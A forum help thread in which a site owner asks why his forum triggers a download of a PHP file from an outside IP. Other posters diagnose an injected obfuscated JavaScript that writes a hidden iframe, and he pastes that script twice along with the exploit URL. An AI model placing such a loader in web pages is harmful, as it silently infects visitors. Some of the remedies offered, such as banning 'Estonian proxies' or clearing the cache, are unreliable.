Why is it trying to download this?

[Highway of Life]

Greetings Computer geeks!

I have a forum on my website: http://michaellewismusic.com/forum
And everytime I use Mozilla Firefox web browser, it tries to download this file:

You have chosen to open
newexpl.php
which is a: PHP Document
from: http://195.95.218.173
What should Firefox do with this file...

It does the same using the Mozilla Camino web browser, however, while using Safari, Mozilla, IE, and Netscape, it does not try to download any file.

What is this, why is it trying to download when I go to my forum, and why only Firefox and Camino?

I was able to open the file successfully using a text editor, and it seems to be a bunch of jumble with no apparant pattern, except for the header.
This is the header information for that file:

From: <x>
Subject: x
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"
Content-Transfer-Encoding: base64

Any help would be great.

Thanks,
Dave

 

[DCIScouts]

More than likely, the other web browsers are downloading them, they just aren't prompting you before it downloads the file. There probably is some sort of malware imbedded in that file... This is the reason why I switched over to Firefox because it catches a lot of these type of files that IE and various other browsers don't.

In order to combat this problem, I would contact your forum administrator and see what he knows about this situation and what is going on... Hopefully this helps!

 

[Highway of Life]

More than likely, the other web browsers are downloading them, they just aren't prompting you before it downloads the file. There probably is some sort of malware imbedded in that file... This is the reason why I switched over to Firefox because it catches a lot of these type of files that IE and various other browsers don't.

In order to combat this problem, I would contact your forum administrator and see what he knows about this situation and what is going on... Hopefully this helps!

Nope, none of the other browsers are even trying to download the file.
For one thing, Mozilla and Netscape always prompt, same as Firefox.
Safari, Camino and IE would pull up the downloads window.

I am one of the Forum admins, we have been working on the problem.

 

[Highway of Life]

Here is a record of our conversation, this might be of interest to some of you.

Somebody hacked you. That crap at the bottom of your index page source is definitely a hacker's handiwork. Perhaps your forum was out of date.

PS. This belongs in Support, not in Discussion.

I'm afraid that the best solution is to backup your database and files, clean out everything and install 2.0.17. Also a few protective considerations for the site (dependin of hoster) would be to consider...

Manf

Thanks, Do know how I might get rid of this?
and what "Crap" are you talking about at the bottom of the index page.
or I should say what browser are you using.

Can you email me an exact copy of what it says down there?

Thanks

Also check the forum descs in the database as they put the rubbish in there usually...

Manf

I guess it is a virus that is running in the background and automatically running in the background.

FAQ about the virus

MHTMLRedir!exploit
JScript/]RunRunEXE!Trojan; [JS.]MHTMLRedir!exploit; [HTML.]MHTMLRedir!exploit; [HTML.]MHTMLRedir.exploit trojan

It is a generic detection of web pages or e-mail messages which attempt to exploit the "MHTML URL Processing" vulnerability in Internet Explorer and other similar browsers.

Only Microsoft running-programs are affected by this vulnerability. Mac OSes are not affected by this trojan.

Here is the Javascript code they have in the footer.

<script language="javascript" type="text/javascript">var k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>
#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22xvhu4:1liudph1ux2Brv@
|hv%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@
4#pdujlqzlgwk@3#pdujlqkhljkw@3#vfuroolqj@qrA?2liudphA?2glyA',t=0,h='';
while(t<=k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}
document.write(h);</script>

What is it, or what does it mean, and how can I get rid of it?

Thanks
Dave

Remove that... but consider my previous post as you can't know what else they did to your forum's files.

Manf

Here is the Javascript code they have in the footer.

<script language="javascript" type="text/javascript">var k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>
#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22xvhu4:1liudph1ux2Brv@
|hv%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@
4#pdujlqzlgwk@3#pdujlqkhljkw@3#vfuroolqj@qrA?2liudphA?2glyA',t=0,h='';
while(t<=k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}
document.write(h);</script>

What is it, or what does it mean, and how can I get rid of it?

Thanks
Dave

I guess that it is the javascript triggering this vulnerability.

It is embedded in every article page (in the very bottom of the source
code).

It results in a download (in case your browser is not vulnerable, other
than that it is just executed) of a file from the following URL:
http://195.95.218.173/dl/newexpl.php?adv=adv782
This server is hosted in Estonia. The file is an Internet Explorer
exploit (targetting a known XMLHTTP- and ADODB stream vulnerability)
which has been assigned the following names:

Exploit.VBS.Phel.i
VBS.Psyme.114
Trojan.Downloader.VBS.Phel.I
Trojan-Downloader.VBS.Psyme

The following may be different variants of this:
Troj/Psyme-CA
VBS/Psyme
CHM_PSYME.AG

It is a Visual Basic script and, as such, only runs on windows platforms.

The exploit will, when executed, cause a trojan horse to be downloaded
and executed.

Just remove it. And as Hundeforums said backup everything and install anew.

Okay, we are working on that right now.
How did they manage to gain access and put that in there, and
How do I prevent this from happening in the future?

Hmm, cleared the Cache, and the problem seems to have disappeared.
So I assume they somehow gained access the the Cache and added that to our forum.
So, how do I protect our forum from the same thing happening again?

Thanks everyone for your help.

Highway

It is simple, the groups that usually add the redirect exploits are classified as semi-amateurs and usually , or most probably, use Estonian Proxies and are hosted by three giant illegal servers found there.

So as a general rule ban, directly from your cpanel (or any gui you use for your domain) the range of free Estonian Proxies.

Here's a list of the main proxies that hackers, most probably, targetting your site may use. At least every week check some and ban the least used proxies (The most used are used by amateurs and "hackers" as a general rule would prefer proxies less used which also means less chance of those proxies being ban from public networks).

http://www.multiproxy.org/anon_proxy.htm
http://www.samair.ru/proxy/
http://tools.rosinstrument.com/proxy/
http://www.checker.freeproxy.ru
http://www.proxy4free.com
http://www.publicproxyservers.com
http://www.anonymitychecker.com
http://www.proxz.com
http://www.digitalcybersoft.com/ProxyList/

Thanks to Xtreem Styles the problem was as easy as clicking the mouse. (Clearing the Cache)
Thanks for the help.

Oh, yes, how do I find the range of Free Extonian Proxies?

Highway

 

[flame1117]

It dosn;t download anything for me in firefox for 2 PC's.

 

[Highway of Life]

It dosn;t download anything for me in firefox for 2 PC's.

We seemed to have fixed the problem now.
But I'm still not sure how they managed to gain access, or how to prevent them from gaining access again.

Any help?

Thanks,
Highway

 

[flame1117]

I dout anyone "hacked" you. Its possible but i dout it.

 

[DCIScouts]

I would guess that someone hacked into your servers and then planted this program into your servers....

 

[Kristjan]

I come from Estonia btw (I don't live there any more tho...). If you are talking about the FTP servers there, then they are not illegal. Their content is illegal.